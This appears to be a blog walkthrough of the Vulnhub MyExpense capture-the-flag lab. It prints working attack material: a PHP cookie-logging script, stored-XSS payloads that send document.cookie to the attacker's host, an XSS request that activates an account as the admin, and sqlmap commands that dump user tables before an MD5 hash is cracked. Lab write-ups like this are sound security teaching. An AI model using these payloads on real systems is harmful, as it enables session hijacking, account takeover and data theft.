Where Notes Work
MyExpense Walkthrough
Vulnhub [MyExpense] [Walkthrough]
SCENARIO
Note that the password of Samuel’s account is fzghn4lw, and after the challenge is done, the flag will be displayed on the application of Samuel’s account.
What we have to do first is to log in to Samuel’s account and send the Expense report to the manager.
Machine IP: 192.168.43.167
Finding open ports and services using Nmap.
as we can that, there is one port open which is running a website, and there is a robots.txt file referring to the “/admin/admin.php” path.
by visiting the website, we can see that there is a Welcome box referring to how the MyExpense application work, after reading that we understand, the manager and financial approver have to validate the expense request of any employee.
If we try to login to Samuel’s account it shows, Your account has been locked or is inactive. Please contact the administrator team, by going to “/admin/admin.php”, we can see that a dashboard of inactive and active accounts and Samuel account is inactive, if we try to activate this, it shows Error 401 – Unauthorized, it means we cannot do this.
let’s click on Don’t have an account? and create a one to check XSS vulnerability, if we click on the Sign-up button it shows that the button is disabled, enabled it from Inspect Element, just change it to enabled=””, see picture below.
after Signup, by visiting the “/admin/admin.php” our code gets executed, so we find that it is vulnerable to XSS.
Now, we will try to steal cookies using a PHP code, create a file named cookie.php inside “/var/www/html/”, see cookie.php code below.
<?php
$cookie = $_GET['cmd'];
$file = fopen('log.txt','a');
fwrite($file,$cookie."\n");
?>
after that, stop the apache server and start the PHP server in terminal,
root@prokunal:~# php -S 192.168.43.225:80 // local ip
after, that we again create a dummy account with a cookie stealer script,
cookie stealer script to upload is below,
<script>document.write('<img src="http://192.168.43.225/cookie.php?cmd='+document.cookie+'" />');</script>
see picture below,
after creating an account, if we visit the “/admin/admin.php” page we can see that we are receiving the cookies value.
after that, we will try to copy the receiving cookie value and change it to the current one, then refresh the page, now it’s showing, “Sorry, as an administrator, you can be authenticated only once a time.”, for changing the cookie value, I am using firefox addon “cookie editor”
So we cannot change the cookies value, but from that message we see that the request is going as an administrator, so what if we try to activate the Samuel account using XSS vulnerability, let’s try.
As a non-user, if we are trying to activate the Samuel account, it’s showing, Error 401 – Unauthorized, after that just copy the link,
Link: 192.168.43.167/admin/admin.php?id=11&status=active
Now, we will try to make a request as an administrator to activate the Samuel account, to do this we will use this script, no use of PHP server now.
<script>document.write('<img src="http://192.168.43.167/admin/admin.php?id=11&status=active" />');</script>
Let’s create another account, and paste the script and signup,
after signup goto the “/admin/admin.php” page, now you can see that Samuel account is now active,
now, let’s login into Samuel account, and goto the Expense Report page,
as we can see there is an opened expense report, now click on the green button and submit it, but it’s not over yet, now Samuel manager has to accept this report and after that the financial approver as we see on Welcome Page, so, now let’s see who is Samuel manager, by going to Samuel profile it shows that the manager is Manon Riviere,
now, we have to access the Manon Riviere account to accept the Samuel expense report.
on the homepage of Samuel Account, there is a post a new message box, let’s check is it vulnerable to XSS?
as we can see that, yes it is vulnerable to XSS, let’s try to steal the cookies value of other users, for this, we will follow the same command as we use before,
note: you can change the filename cookie.php to cookie-stealer.php or something else, but also change in the script tag.
so, create a file named cookie.php inside “/var/www/html/” folder and start the php server by “php -S <local ip>”, see the cookie.php code below,
<?php
$cookie = $_GET['cmd'];
$file = fopen('log.txt','a');
fwrite($file,$cookie."\n");
?>
after that, we will post a script as a message, see script below,
<script>document.write('<img src="http://192.168.43.225/cookie.php?cmd='+document.cookie+'" />');</script>
after that, we can see that, we are receiving the cookies values,
now we will try to change the cookie value one by one and will see if we get Samuel’s Manager account which is Manon Riviere.
In the first try, I get the account of Ninette Thomas, after changing the cookie values 3-4 times, finally, I got the account of Manon Riviere,
now, let’s go to the Expense reports page of Manon Riviere, now we can see that there is Samuel Expense report is submitted but no action was taken by Manon Riviere, now click on the green button and accept it,
after that, we have to accept the expense report of Samuel from Manon Riviere’s Manager, who is Paul Baudouin, the financial approver, you can see the Manon manager name on the Manon profile page.
After that going on Rennes page, we can see there is a database, database means SQL, and looking at the URL, it seems like it is vulnerable to SQL Injection, after that we will try to enumerate the database using sqlmap (Linux built-in tool),
It shows an error that we have to provide the right HTTP authentication type and valid credentials, so just copy the headers of the Manon Riviere account and Cookie Session ID, from Inspect Element in the Network tab, or you can use burp suite.
Dumping the tables using sqlmap, by doing sqlmap it asks for yes or no every time, no in all options,
root@prokunal:~# sqlmap -u http://192.168.43.167/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="PHPSESSID=efk0etl8om09844b4fi5qcu392" --tables --dump
by dumping the tables we find the database “myexpense” and table “user”,
now, let’s dump the data from table “user”,
root@prokunal:~# sqlmap -u http://192.168.43.167/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="PHPSESSID=efk0etl8om09844b4fi5qcu392" -D myexpense -T user --dump
by dumping the data from the “user” table, we find the paul password in a hash,
by identifying the hash in hash-identifier, we find that it is md5,
Let’s crack the hash in CrackStation, here we find the password of Paul Baudouin,
now let’s log in to paul account using this password, now we are logged in as Paul Baudouin,
now goto Expense reports page, and accept the Samuel expense, as humanity accept the Manon Riviere expense also😁😝
now we are done, now login into Samuel account and goto Expense report page, you will see this🥳,
let me know in the comment section if you face any problem.
My partner and I absolutely love your blog and find nearly all of your post’s to be exactly I’m looking for. Would you offer guest writers to write content for you? I wouldn’t mind publishing a post or elaborating on a lot of the subjects you write with regards to here. Again, awesome weblog!